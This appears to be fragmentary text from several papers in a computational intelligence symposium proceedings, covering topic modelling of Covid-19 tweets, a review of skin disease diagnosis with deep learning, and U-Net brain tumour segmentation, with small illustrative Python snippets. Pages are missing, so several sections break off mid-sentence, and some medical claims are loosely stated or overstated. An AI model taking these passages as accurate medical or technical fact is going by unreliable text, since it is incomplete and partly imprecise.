nation. But the uniform underlying characteristic of these social media conversations is that they represent the common public's concerns and interests, the challenges and issues faced by ordinary citizens, the impact and acceptability of the measures taken by the government, and the future social and economic challenges that the nation's government must address in the coming years. It is estimated that the world will take 3–5 years to fully recuperate from the social, economic and healthcare impact of the Covid-19 pandemic. This is the main motivation behind choosing socio-economic global trend prediction as one of our research goals.
We use the Latent Dirichlet Allocation (LDA) and Gibbs Sampling Dirichlet Multinomial Mixture (GSDMM) algorithms for topic modelling from unstructured user-generated
text on social media. Topic modelling is an unsupervised machine learning technique which builds a statistical topic model from raw unstructured text to discover the hidden and abstract topics, themes and ideas being discussed in it. Topic modelling
is an effective technique to quickly understand and summarize large volumes of
free form text and extract meaningful insights when annotated or labelled data is
not available. We implemented topic modelling in our proposed decision-making governance framework as it can quickly build comprehension of what common people are discussing on social media from Covid-19-related user posts. As we
mentioned before, having this comprehension can help government bodies better
understand the common public concerns and challenges, opinions of citizens, and
discover various social and economic topics.
The LDA algorithm [10] builds a statistical model based on the distribution of words in a given input document by considering each document as a mixture of topics, where each topic is in turn a collection of semantically related dominant keywords.
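The inference behind such topic models can be made concrete with a compact collapsed Gibbs sampler for LDA (GSDMM likewise uses Gibbs sampling, over a Dirichlet multinomial mixture). This is a toy pure-Python illustration, not the Gensim implementation used in our experiments:

```python
import random
from collections import defaultdict

def lda_gibbs(docs, K, iters=200, alpha=0.1, beta=0.01, seed=0):
    """Collapsed Gibbs sampling for LDA over tokenized documents.

    docs: list of token lists; K: number of topics.
    Returns the top 3 words of each inferred topic.
    """
    random.seed(seed)
    vocab_size = len({w for d in docs for w in d})
    # Random initial topic assignment for every token.
    z = [[random.randrange(K) for _ in doc] for doc in docs]
    doc_topic = [[0] * K for _ in docs]                # n_{d,k}: topic counts per doc
    topic_word = [defaultdict(int) for _ in range(K)]  # n_{k,w}: word counts per topic
    topic_total = [0] * K                              # n_k: total tokens per topic
    for d, doc in enumerate(docs):
        for i, w in enumerate(doc):
            t = z[d][i]
            doc_topic[d][t] += 1; topic_word[t][w] += 1; topic_total[t] += 1
    for _ in range(iters):
        for d, doc in enumerate(docs):
            for i, w in enumerate(doc):
                t = z[d][i]  # remove the current assignment, then resample
                doc_topic[d][t] -= 1; topic_word[t][w] -= 1; topic_total[t] -= 1
                weights = [
                    (doc_topic[d][k] + alpha)
                    * (topic_word[k][w] + beta) / (topic_total[k] + vocab_size * beta)
                    for k in range(K)
                ]
                t = random.choices(range(K), weights)[0]
                z[d][i] = t
                doc_topic[d][t] += 1; topic_word[t][w] += 1; topic_total[t] += 1
    return [sorted(tw, key=tw.get, reverse=True)[:3] for tw in topic_word]
```

The resampling weight for topic k is proportional to (n_{d,k} + α)·(n_{k,w} + β)/(n_k + V·β), i.e. a word is drawn toward topics already prominent in its document and already associated with that word.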
444 R. Jindal and A. Malhotra
Various Twitter datasets of Covid-19 related tweets have been collected and made
publicly available for research3,4,5 [12]. We used the tweets from one of these publicly available datasets6; this dataset has been collected since early March 2020, i.e. around the onset of the pandemic. It contains tweets by users who applied various Covid-19-related hashtags, e.g. #coronavirus, #coronavirusoutbreak, #coronaviruspandemic, #covid19, #ihavecorona, etc. From this dataset, we selected
tweets in the English language for the India region, for the period 29 March 2020 to 30 April 2020. This selected dataset contained approximately 42,000 tweets from various locations in India, as depicted in Fig. 2; the date-wise distribution of the selected dataset is shown in Fig. 3.
We used the Cython-based spaCy library to implement our Information Extraction Module for extracting entities and noun and verb phrases. spaCy is a very fast NLP library for building large-scale, industrial, real-world natural language understanding systems and is meant for production-scale usage7; hence, it is a natural first choice for implementing our Big Data framework. The most important entities and nouns extracted from the selected dataset are depicted in Fig. 4.
Next, we used the Gensim Python library to implement the LDA algorithm for topic modelling, and pyLDAvis for graphical visualization of the resulting topic-word clusters. For a prototype implementation of the GSDMM algorithm, we referred to GitHub libraries and tutorials.8,9,10 After multiple experiments, we extracted 17 topics with 317 unique words (i.e. a Topic-Word (K, M) matrix of size (17, 317)) that had minimal overlap between the topic clusters (see Fig. 5; the top keywords from 2 sample topic clusters are also shown in the figure).
At the time of writing, there have been around 2.2 million deaths and over 100 million Covid-19 cases worldwide.11 Covid-19 is an unforeseen global health emergency that has caused
fear, uncertainty, mental health issues and a lot of pain due to the irreplaceable loss
of loved ones. The collateral damage and impact of the pandemic on society and the economy cannot be accurately gauged, and its lasting impact will only be known in the years to come. Hence it becomes imperative for the government
3 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
4 https://github.com/ben-aaron188/covid19worry.
5 https://github.com/thepanacealab/covid19_twitter.
6 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
7 https://spacy.io/.
8 https://towardsdatascience.com/short-text-topic-modelling-70e50a57c883.
9 https://github.com/rwalk/gsdmm.
10 https://github.com/Matyyas/short_text_topic_modeling/blob/master/notebook_sttm_example.ipynb.
11 https://www.worldometers.info/coronavirus/.
and public institutions to monitor real-time data, take data-driven informed decisions, and continuously observe their efficacy. Owing to their popularity and gigantic user bases, social media platforms are a powerhouse of first-hand information from citizens. In our literature survey, we did not find extensive use of publicly available, real-time social media data feeds for governance during the Covid-19 pandemic. To address this research gap, we proposed an intelligent decision support framework for efficacious governance that can assist in data-driven decision making during a global emergency of any kind, presently the Covid-19 pandemic. As a proof of concept, we have demonstrated a prototype implementation of our proposed framework on a publicly available sample Covid-19 tweet dataset.
As part of our future research, we plan to enhance this governance framework to incorporate multilingual and multimodal user-generated content, since India itself has many vernacular languages. Another important module we wish to incorporate in our governance framework will address the spread of misinformation through social media, since misinformation leads to unwanted fear, panic and anxiety among the citizens of a country during such difficult crises.
References
1. Alamo, T., Reina, D. G., & Millán, P. (2020). Data-driven methods to monitor, model, forecast
and control covid-19 pandemic: Leveraging data science, epidemiology and control theory.
arXiv preprint arXiv:2006.01731.
Abstract The skin acts as a protection barrier against environmental danger and
foreign substances. Every year, millions of people are affected by skin disorders that may develop into skin cancer at a later stage. The problem of skin disorders and skin cancer is spreading fast due to exposure to sunlight and ultraviolet rays, pollutants, and chemicals such as nitrates and arsenic. This is an alarming disease, so it is necessary for everyone to pay attention to it. The automatic recognition of skin disease from
dermoscopic images is a big challenge due to the low contrast, a huge inter/intra-class
variation, and high visual similarity among different skin lesions. With the explosion of advanced information and recognition models, primarily Deep Learning (DL) and Transfer Learning (TL) models, all aspects of recent research have been influenced. In this paper, we briefly discuss skin disease and the work already done using Machine Learning (ML) and Deep Learning (DL) models. A system will be developed in the future for the early diagnosis of skin disease, in which the features of dermoscopy images will be extracted using a Convolutional Neural Network (CNN). The system will thus be efficient in focusing on the right features of the image and will help enhance accuracy by minimizing errors in image interpretation. It can provide a more confident diagnosis to dermatologists and can assist doctors as a second opinion in providing accurate decisions.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 449
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_36
450 V. Anand et al.
1 Introduction
The skin is the outer covering that separates the human body from its environment. It is made of flexible outer tissue and performs three main functions: protection, regulation, and sensation. It regulates body temperature and stores water, vitamin D, and fat. The two main layers of the skin are the dermis and the epidermis. The epidermis is the outermost layer and, unlike the dermis, is thin and does not contain blood vessels [1]. Melanocytes, which are melanin-producing neural crest-derived cells, are located in the bottom layer of the epidermis. The dermis is a connective tissue composed of two layers: the deeper reticular layer and the outer superficial papillary layer. The hypodermis consists of loose connective tissue with collagen and elastin fibers.
Skin disease includes skin conditions caused by exposure to the sun, in which irregular cells develop in the epidermis, the outer layer of the skin. It is characterized by dark, wart-like patches on the body, which can be benign or malignant. Sometimes, normal skin abnormalities such as birthmarks are also referred to as skin disease. The various kinds of skin disease are discussed below:
(i) Actinic Keratoses (AKIEC): It is also known as a solar keratosis or Bowen’s
disease. It is a type of sun damage due to exposure to sun light in which the
abnormal cells develop in the topmost layer of the skin. It looks like a scaly
patch or rough skin, as shown in Fig. 1. A small percentage of actinic keratoses can eventually become skin cancer. The risk can be reduced by protecting the skin from ultraviolet (UV) rays [2].
(ii) Benign Keratosis or Seborrheic Keratosis (BKL): This is a non-cancerous skin growth that is more common in older people. It is usually black, light tan, or brown, and the growths look slightly raised, as shown in Fig. 2. They are harmless and not contagious, and no treatment is required, although they can be removed if a person does not like how they look [4].
(iii) Dermatofibromas (DF): These are small, harmless growths that appear on the skin. They can grow on any part of the body but are most commonly seen on the lower legs, upper back, and arms, as shown in Fig. 3. They occur in adults but are very rare in children [5].
(iv) Melanocytic Nevi (NV): Melanocytic nevi or melanocytic nevus can be seen
on the body of almost all individuals, as shown in Fig. 4. Some people have a few, while others have hundreds of melanocytic nevi on their body [6].
(v) Vascular Lesions (VASC): These are common abnormalities, better known as birthmarks, as shown in Fig. 5.
(vi) Skin Cancer: Skin cancer is a type of cancer that develops on skin exposed to sunlight. Exposure to ultraviolet light or ionizing radiation can also cause skin cancer. The problem is worse at high elevations or in areas near the equator, where sunlight exposure is more intense. Certain medications, such as chemotherapy agents, can also increase the risk of skin cancer. Fair-skinned and fair-haired people are prone to skin cancer due to insufficient skin pigmentation. Exposure to chemical pollutants (nitrates, arsenic, tar, coal, oils, and paraffins) and scars from severe burns can also cause skin cancer. Skin cancer falls into two major categories: non-melanoma and melanoma.
a. Melanoma (MEL): Melanoma affects the melanocyte cells of the lower epidermis. It is malignant and tends to spread to other parts of the body, and it is fatal if not treated early. Sometimes an existing mole that itches, bleeds, or changes shape or color indicates melanoma. It appears as a small black spot or a larger brownish patch with white or red speckles, and it can spread easily. It is linked with the melanocytes of the epidermal layer, and its cure rate is lower than that of non-melanoma cancers. Figure 6 shows dermoscopy images of melanoma and non-melanoma.
b. Non-Melanoma: Non-melanoma does not affect melanocytes and is unlikely to spread to other parts of the body, although it may be locally disfiguring if not treated early. These cancers progress slowly, rarely spread beyond the skin, can be detected easily, and are usually curable. Figure 6b shows a dermoscopy image of non-melanoma. Non-melanoma is the more commonly occurring cancer, with more than 4.3 million cases of basal cell carcinoma and over 1 million cases of squamous cell carcinoma [7]. The broader category of non-melanoma skin cancer includes basal cell carcinoma (BCC) and squamous cell carcinoma (SCC).
• Basal Cell Carcinoma (BCC): It is widely recognized disease in people. The
main symptoms of BCC include a reddish bluish or brown black patch of skin.
It rises from basal layer of epidermis. It begins as a waxy nodule small in size
with pearly borders. BCC is categorized by erosion and invasion of adjoining
tissues. It rarely metastasizes, but its reappearance is common.
• Squamous Cell Carcinoma (SCC): It appears like scaly patch or like firm
reddish bump that grows gradually. It can be treated without difficulty if
primary detection is possible but it is most likely to spread as compared to
BCC. It is mostly seen in Black and Asian Indians. Figure 7b shows the image
of squamous cell carcinoma.
Early diagnosis of skin cancer involves removal and microscopic examination of the cells. Between 30 and 50% of cancers can currently be prevented by avoiding risk
Skin Disease Diagnosis: Challenges and Opportunities 453
factors. The cancer burden can also be reduced through early detection of cancer and
management of patients who develop cancer [9].
2 Literature Review
The presence of skin disease can be identified by observing irregular edges, changed color, or patches on the skin. Different researchers have designed different techniques for the diagnosis of skin disease using machine learning and deep learning architectures. The relevant literature presenting the work done by different researchers in this domain is reviewed here. Each researcher has tried to design a different model and has obtained a different level of accuracy. Machine learning essentially teaches computers to perform tasks that humans can perform naturally, but it is less accurate when working with large datasets for prediction purposes [17, 18]. Garnavi et al. [19] presented a clustering-based histogram thresholding algorithm for segmentation, in which morphological operators are used to obtain the segmented lesion. The algorithm was tested on 30 high-resolution dermoscopy images and achieved an accuracy of 97%. Fassihi et al. [20] performed segmentation using morphological operators and feature extraction using the wavelet transform; in the pre-processing stage, a mean filter was used for noise removal. The dataset consisted of 91 images taken from hospitals and websites, and the method achieved an accuracy of 90%. Smaoui et al. [21] performed pre-processing followed by region-growing segmentation, and then feature extraction based on the ABCD rule. On a set of 40 dermoscopic images, the method achieved an accuracy of 92%, a sensitivity of 88.88%, and a specificity of 92.3%. Deep
learning (DL) learns different features directly from the given data. Deep learning techniques are capable of handling high-dimensional data and give better performance. They are efficient in focusing on the right features of an image on their own. Therefore, deep learning proves more efficient than machine learning techniques, as deep learning techniques can work with large databases and
with greater accuracy. In recent years, improvements in deep learning convolutional neural networks (CNNs) have shown favorable results, and classification in medical image processing has become a challenging research domain [22]. Zafar et al. [23] proposed a method combining two architectures, the U-Net and the ResNet, collectively called Res-Unet. The dataset used was taken from the PH2 dataset, with 200 dermoscopic images, and from the ISIC-17 test data, consisting of 600 images. On
the ISIC-17 dataset, the Jaccard index was 77.2% and the dice coefficient was 0.858, whereas on the PH2 dataset, the Jaccard index was 85.4% and the dice coefficient was 0.924. Amin et al. [24] performed pre-processing to resize the images and used the Otsu algorithm to segment the skin lesion. The publicly available datasets (PH2, ISBI 2016-2017) were merged to form a single large dataset for validation of the proposed method. The obtained results show a sensitivity of 99.52%, a specificity of 98.41%, a positive predictive value of 98.59%, a false negative rate of 0.0158, and an accuracy of 99.00%. Mahbod et al. [25] investigated image downsampling and cropping of skin lesions together with a three-level fusion approach. A total of 12,927 dermoscopic skin lesion images extracted from the ISIC archive and the HAM10000 dataset were used, achieving an accuracy of 86.2%. This work has some limitations; the biggest limitation of the fusion approach is the large number of sub-models, which consequently require significant training time.
3 Justification of Research
People do not take skin disease seriously, yet skin disease is a major cause of deaths in the US and worldwide, and its occurrence in humans has been increasing day by day. To prevent this, it is necessary to diagnose the disease at an early stage; otherwise, it may develop into skin cancer. It is estimated that 196,060 new cases of melanoma, 95,710 non-invasive (in situ) and 100,350 invasive, will be diagnosed in the US in 2020. Invasive melanoma is projected to be the fifth most common cancer for men (60,190 cases) and the sixth most common cancer for women (40,160 cases) in 2020 [26]. In 2020, it is estimated that 6,850 deaths will be attributed to melanoma: 4,610 men and 2,240 women. Owing to the small number of trained dermatologists in the world, the precise diagnosis of skin disease in dermoscopy images is difficult. AI-enabled image analysis techniques like deep learning help in getting a clear picture of the disease in the image. Deep learning-based systems can be employed to improve the performance of disease diagnosis in the field of medical science by minimizing errors in image interpretation and enhancing accuracy.
4 Research Gaps
Based on the literature survey conducted in this research area, the identified research gaps are as follows. A large dataset is needed to reduce the overfitting problem and to achieve better accuracy and generalization of the model. Fuzzy borders, noise, low brightness, skin hair and bubbles, and color variation are issues that vary from image to image; segregating the affected area in dermoscopic images therefore remains a major challenge. A number of skin lesions can mimic skin disease, which could result in
5 Problem Statement
collect the medical images. To resolve this issue, data augmentation techniques can be used to increase the number of images. Data augmentation is performed using different transformation techniques, such as flipping the image horizontally and vertically; other augmentation techniques such as rotation, brightness adjustment and zooming can also be applied to the original image to increase the dataset size. After that, a CNN-based model will be proposed for the accurate detection of skin disease in dermoscopy images. Then, comparison will be done using different metrics such as precision, accuracy, specificity, sensitivity and F1 score, and the performance will be validated against other state-of-the-art models.
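The flipping and rotation transforms described above can be sketched directly on a raw pixel matrix; a real pipeline would typically use an image library (e.g. Pillow or a DL framework's augmentation utilities), so this pure-Python version is only an illustrative sketch:

```python
def hflip(img):
    """Horizontal flip: mirror each row of the pixel matrix."""
    return [row[::-1] for row in img]

def vflip(img):
    """Vertical flip: reverse the order of the rows."""
    return img[::-1]

def rotate90(img):
    """Rotate the pixel matrix 90 degrees clockwise."""
    return [list(row) for row in zip(*img[::-1])]

def augment(img):
    """Return the original image plus three flipped/rotated variants."""
    return [img, hflip(img), vflip(img), rotate90(img)]
```

Applied to every training image, even these four variants quadruple the dataset size, which helps reduce the overfitting noted in the research gaps.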
6 Conclusion
Skin disease cases are increasing day by day, so early diagnosis is important; otherwise, skin disease may develop into skin cancer, and it is therefore necessary for everyone to pay attention to it. Proper and early diagnosis of skin disease is important to prevent any life threat caused by it. Hence, a deep learning-based system will be developed in the future for the early diagnosis of skin disease, in which the features of the images will be extracted using a convolutional neural network. Such a system will be efficient in focusing on the right features of the image and will help enhance accuracy by minimizing errors in image interpretation. A model with such an approach can assist doctors in taking crucial decisions and can help save lives. The proposed model design can thus aid in the early diagnosis of skin disease: it can provide a more confident diagnosis to dermatologists and can assist doctors as a second opinion in providing accurate decisions.
References
1. Seeley, R., Stephens, D., & Philip, T. (2008). In Anatomy and physiology (pp. 1–1266).
McGraw-Hill.
2. Nouveau, S., & Braun, R. (2018). Solar lentigines-dermoscopedia. [Online Accessed August
19 2020].
3. Tschandl, P., Rosendahl, C., & Kittler, H. (2018). The HAM10000 dataset a large collection of
multi-source dermatoscopic images of common pigmented skin lesions. Scientific Data, 14(5).
4. Oakley, A. (2018). DermNet NZ Seborrhoeic Keratosis. [Online Accessed August 19 2020].
5. Pedro, Z. (2018). Dermatofibromas-dermoscopedia. [Online Accessed August 19 2020].
6. Braun, R. (2018). Benign melanocytic lesions-dermoscopedia. [Online Accessed August 19
2020].
7. Rogers, H. W., Weinstock, M. A., Feldman, S. R., & Coldiron, B. M. (2012). Incidence esti-
mate of non-melanoma skin cancer (keratinocyte carcinomas) in the US population. JAMA
dermatology, 151(10), 1081–1086.
8. Treatment Guides. (2007). Squamous cell carcinoma—Treatment. Retrieved December 21, 2007, from https://www.skintherapyletter.com/skin-cancer/squamous-cell-carcinoma/.
9. World Health Organization. Cancer prevention. Retrieved from https://www.who.int/cancer/prevention/en/.
10. Bray, F., Ferlay, J., Soerjomataram, I., Siegel, R. L., Torre, L. A., & Jemal, A. (2018). Global
cancer statistics 2018: GLOBOCAN estimates of incidence and mortality worldwide for 36
cancers in 185 Countries. CA: A Cancer Journal for Clinicians, 68(6), 394–424.
11. https://www.medgadget.com/2011/01/handyscope_turns_iphone_into_professional_dermatoscope.html.
12. Argenziano, G., Soyer, H. P., Giorgi, V. D., Piccolo, D., Carli, P., & Wolf, I. H. (2000) Interactive
Atlas of Dermoscopy-EDRA Medical Publishing & New Media.
13. Dermofit Image Library. https://homepages.inf.ed.ac.uk/rbf/DERMOFIT/datasets.htm.
14. Mendonça, T., Ferreira, P. M., Marques, J. S., Marcal, A. R., & Rozeira, J. (2013). PH 2-A
dermoscopic image database for research and benchmarking. In 2013 35th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (EMBC) (pp. 5437–
5440).
15. Kaggle Dataset https://www.kaggle.com/fanconic/skin-cancer-malignant-vs-benign.
16. https://www.isic-archive.com/#!/topWithHeader/wideContentTop/main.
17. Alzubi, J. A., Kumar, A., Alzubi, O. A., Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research and Development.
18. Alweshah, Alzubi, O. A., Alzubi, J. A., Mohammed, S. A. (2016). Solving attribute reduction
problem using wrapper genetic programming. International Journal of Computer Science and
Network Security.
19. Garnavi, R., Aldeen, M., Celebi, M. E., Bhuiyan, A., Dolianitis, C., & Varigos, G. (2010).
Automatic segmentation of dermoscopy images using histogram thresholding on optimal color
channels. International Journal of Medicine and Medical Sciences, 1(2), 126–134.
20. Fassihi, N., Shanbehzadeh, J., Sarrafzadeh, H., & Ghasemi, E. (2011) Melanoma diagnosis by
the use of wavelet analysis based on morphological operators. In International Multi Conference
of Engineers and Computer Scientists.
21. Smaoui, N., & Bessassi, S. (2013). A developed system for melanoma diagnosis. International
Journal of Computer Vision and Signal Processing, 3(1).
22. Tiwari, P., Qian, J., Li, Q., Wang, B., Gupta*, D., Khanna, A., Rodrigues, J., & Albuquerque,
V. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems Research
(Elsevier).
23. Zafar, K., Gilani, S. O., Waris, A., Ahmed, A., Jamil, M., Khan, M. N., & Sohail, K.
A. (2020). Skin lesion segmentation from dermoscopic images using convolutional neural
network. Sensors, 20(6).
24. Amin, J., Sharif, A., Gul, N., Anjum, M. A., Nisar, M. W., Azam, F., & Bukhari, S. A. (2020).
Integrated design of deep features fusion for localization and classification of skin cancer.
Pattern Recognition Letters, 131, 63–70.
25. Mahbod, A., Schaefer, G., Wang, C., Dorffner, G., Ecker, R., & Ellinger I. (2020). Transfer
learning using a multi-scale and multi-network ensemble for skin lesion classification.
Computer Methods and Programs in Biomedicine.
26. American Academy of Dermatology Association. (2021). Skin cancer. Retrieved from https://www.aad.org/media/stats-skin-cancer.
Computerized Assisted Segmentation
of Brain Tumor Using Deep
Convolutional Network
Abstract The number of brain tumor cases has risen dramatically in recent years, affecting people of all age groups, including children. Brain tumor treatment is challenging, especially in determining the spread of the tumor. Magnetic resonance imaging (MRI) has been developed for diagnosing brain tumors without ionizing radiation. Manual segmentation of brain tumors from MRI scans can be tedious and time-consuming, and the results may vary from one diagnostician to another. Therefore, a more efficient and reliable method for brain tumor segmentation is necessary. This paper discusses a segmentation algorithm for brain tumors based on U-Net-type deep convolutional networks.
1 Introduction
Brain tumors are invasive and can be dreadful, owing to their consequences for the motor functions controlled by different parts of the brain. MRI images of brain tumors are taken as input for diagnosis and treatment planning. MRI scans are used to measure brain tumor vascularity, cellularity and blood-brain barrier (BBB) integrity. Variations in the size, shape, location and appearance of tumors pose a challenge, and the unsupervised and supervised techniques proposed in the past have been quite successful, but not as much as expected. Even a slight mistake can cost a patient his or her life, so a more efficient method of brain tumor image segmentation is required. Unsupervised learning methods such as fuzzy clustering with region growing have proven successful in the past, with accuracy reaching up to 77%. Supervised learning methods such as extremely randomized forests with superpixel-based segmentation have also proven quite successful, with accuracy reaching up to 88%. With
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 461
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_37
462 D. Verma and M. S. Pandey
2 Literature Review
The study of brain tumor MRI images via manual image segmentation is a critical step. Manual segmentation takes much time, normally being a slice-by-slice procedure, and the results depend on the operator's knowledge; it is difficult to reproduce the same result even with the same operator. Moreover, HGG tumors exhibit irregular boundaries that may include discontinuities due to aggressive tumor intrusion, which may cause problems and result in poor tumor delineation [10]. Automatic tumor segmentation removes all these problems of manual segmentation.
Supervised learning methods require training data to learn a classification model with which new instances can be categorized and segmented. Both appearance- and context-based features were classified with 83% accuracy using an extremely
Computerized Assisted Segmentation … 463
residual blocks. Neural networks are universal function approximators, and the performance of a network improves as the number of layers increases. However, there is a limit on how many layers can be added to increase accuracy: sufficiently deep networks may be unable to learn even simple functions such as the identity function, due to issues such as vanishing gradients and the curse of dimensionality. Therefore, simply adding more layers to the neural network and training them does not help. Training of a few layers can be skipped by adding skip connections (residual connections). Skip connections are adapted from [3].
Skip Connection
Skip connections are shortcuts that convolutional neural networks employ to jump over some layers, so that training of those layers can be skipped.
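In equation form, a residual block computes y = F(x) + x: the block's output is the transformed input plus the input itself, so the identity mapping remains available even when the learned transform contributes nothing. A framework-free sketch of this idea (illustrative only, not the paper's implementation):

```python
def skip_connection(x, transform):
    """Residual connection: y = F(x) + x, element-wise over a feature vector."""
    fx = transform(x)
    return [f + xi for f, xi in zip(fx, x)]
```

Because the input is added back unchanged, gradients also have a direct path around the transformed layers, which is what mitigates the vanishing-gradient problem in very deep networks.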
MultiResUNet
The classical U-Net falls short in certain respects, for example when the shape and size of the structures in the images vary, and can then produce poor results. To overcome this, MultiResUNet was introduced. In MultiResUNet, Inception-like blocks (from Google's Inception-V3) replace some of the convolutional layers, enabling the U-Net to learn features from images at different scales. The 5 × 5 and 7 × 7 convolutional layers were factorized using 3 × 3 convolutional blocks, and a residual connection was added owing to its efficacy in biomedical segmentation. MultiResUNet follows [4].
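The factorization rests on the standard receptive-field identity for stacked stride-1 convolutions, which can be checked directly (a small sketch of the well-known formula, not code from the paper):

```python
def stacked_receptive_field(n_layers, k=3):
    # Effective receptive field of n_layers stacked k x k convolutions
    # with stride 1: each extra layer widens the field by (k - 1).
    return (k - 1) * n_layers + 1

# Two 3x3 convolutions see a 5x5 window and three see a 7x7 window, which
# is why the 5x5 and 7x7 layers can be replaced by chains of 3x3 blocks.
print(stacked_receptive_field(2), stacked_receptive_field(3))  # 5 7
```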
Synthetic Segmentation in 3D MRI Scans
A generative adversarial network (GAN) is used to increase the contrast within subregions of brain tissue by generating a synthetic image from the FLAIR MRI scan. This synthetic image, along with the FLAIR, T1ce, and T2 scans, is then input to a 3D fully convolutional network (FCN) to segment the tumor regions, following [5].
Dense-Vnet
MRI scans and brain masks were used to train a convolutional neural network, Dense-Vnet. Dense-Vnet is made up of three layers of dense feature stacks whose outputs are concatenated (Fig. 3).
3 Methodology
This section discusses the proposed approach and the methods used for image processing.
Image Segmentation
An image can be divided, or partitioned, into different sections called segments. It is not a good idea to process the whole image at once, because there will be areas that contain no detail. By splitting the image into segments, only the important segments need to be used for image processing. Image segmentation is thus a technique for grouping pixels with similar characteristics into segments.
Dataset
BraTS 2019 uses multi-institutional preoperative MRI scans and focuses on the segmentation of brain tumors, namely gliomas, which are intrinsically heterogeneous in appearance, structure, and histology. In addition, BraTS'19 also emphasizes estimating overall patient survival by integrating analyses of radiomic features and machine learning algorithms, to identify the clinical significance of this segmentation task. The dataset consists of 220 HGG (high-grade glioma) cases and 54 LGG (low-grade glioma) cases.
Network Architecture
A 9-layer U-Net was used to segment the full tumor from the MRI scan: the FLAIR and T2 MRI scans were given as input, and the output was the segmented image of the overall tumor. The middle point of this segmentation was calculated, and the image was cropped in order to segment the core and enhancing tumor (ET) parts. The cropped full-tumor segmentation was given as input to a 7-layer U-Net, whose output is the core and ET parts of the tumor, provided sufficient pixels are present in the region (Fig. 4).
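The centering-and-cropping step described above can be sketched as follows (pure Python on nested lists; the 240 × 240 and 64 × 64 sizes come from the paper, while the helper names are our own illustration):

```python
def mask_centroid(mask):
    """Middle point of a binary mask: mean row/column of its nonzero pixels."""
    pts = [(r, c) for r, row in enumerate(mask)
                  for c, v in enumerate(row) if v]
    return (sum(r for r, _ in pts) // len(pts),
            sum(c for _, c in pts) // len(pts))

def crop_around(image, center, size):
    """Crop a size x size window centered on `center`, clamped to the image."""
    r0 = max(0, min(center[0] - size // 2, len(image) - size))
    c0 = max(0, min(center[1] - size // 2, len(image[0]) - size))
    return [row[c0:c0 + size] for row in image[r0:r0 + size]]
```

In the pipeline, the full-tumor mask predicted from the FLAIR/T2 scans would supply the centroid, and the 64 × 64 crop of the T1ce scan around it would feed the 7-layer U-Net.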
Algorithm
1. Initially, a single U-Net model was used to segment the full tumor, the tumor core, and the enhancing tumor (ET). It was found that the full tumor was segmented, but the core and ET were segmented poorly or not at all. The problem was that the core and ET are too small compared with the whole tumor: they consist of far fewer pixels, so the model sometimes predicted that there was no tumor.
2. To solve this, the full tumor was first predicted by feeding the FLAIR and T2 MRI scan images into a 9-layer U-Net. The full-tumor prediction was then cropped to extract the core and ET parts from the T1ce MRI scan, by calculating the middle point of the full-tumor prediction, around which most of the pixels lie.
3. The cropped parts were fed into another 7-layer U-Net, which predicts the core and ET of the tumor. In post-processing, a coloring algorithm was applied, and the core and ET predictions were pasted back into the full-tumor prediction after assigning different colors to the core and ET.
4. The learning rate for training both U-Nets was 1e-4; the original images were 240 × 240, and the extracted core and ET crops were 64 × 64.
5. Models were trained for 100 to 300 epochs, until convergence occurred. Dice loss was used:
6. Dice loss = 1 − Dice coefficient
7. Dice coefficient = (2 · Σ(true · pred) + smooth) / (Σ true + Σ pred + smooth),
where smooth is a factor used to smooth out boundary predictions so that the boundary is not crisp.
8. 9-layer U-Net architecture (4th and 6th blocks removed to form 7-layer U-Net)
(Fig. 5).
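The loss defined in steps 6–7 can be written directly in Python (a sketch over flat pixel lists; the value smooth = 1.0 is a common choice and is our assumption, not stated in the paper):

```python
def dice_coefficient(true, pred, smooth=1.0):
    # true, pred: flat lists of pixel values in [0, 1].
    intersection = sum(t * p for t, p in zip(true, pred))
    return (2.0 * intersection + smooth) / (sum(true) + sum(pred) + smooth)

def dice_loss(true, pred, smooth=1.0):
    # Dice loss = 1 - Dice coefficient, as in step 6.
    return 1.0 - dice_coefficient(true, pred, smooth)

# A perfect prediction gives a coefficient of 1 and a loss of 0.
print(dice_loss([1, 0, 1, 1], [1, 0, 1, 1]))  # 0.0
```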
Flow Graph of Proposed Model
The BraTS dataset is used each year for the multimodal brain tumor segmentation and detection competition. A test accuracy of around 90% is achieved.
We consider the result in terms of Recall, Precision and F1 Score (Figs. 6, 7, 8).
Precision = TP / (TP + FP)
Recall = TP / (TP + FN)
F1 Score = 2 × (Precision × Recall) / (Precision + Recall)
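These metrics follow directly from the confusion-matrix counts; as a sanity check, they can be computed as below (a small sketch, not the paper's evaluation code):

```python
def precision_recall_f1(tp, fp, fn):
    # Standard definitions from true positives (tp), false positives (fp)
    # and false negatives (fn); F1 is the harmonic mean of the first two.
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    return precision, recall, f1

# Example: 8 true positives, 2 false positives, 2 false negatives.
print(precision_recall_f1(8, 2, 2))
```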
Challenges
• The application may face many challenges, such as low-resolution MRI scans and a small amount of data when training on new data (transfer learning).
• Usually, the resolution and tissue contrast of the acquired data entering the segmentation algorithms are too low for most algorithms to accurately identify many small subregions.
• The tumor boundaries may sometimes not be well defined in the MRI scan, which can lead to wrong segmentation.
Fig. 6 Result: original data (FLAIR, T1ce, T1, and T2 scans) and the corresponding predictions
4 Conclusion
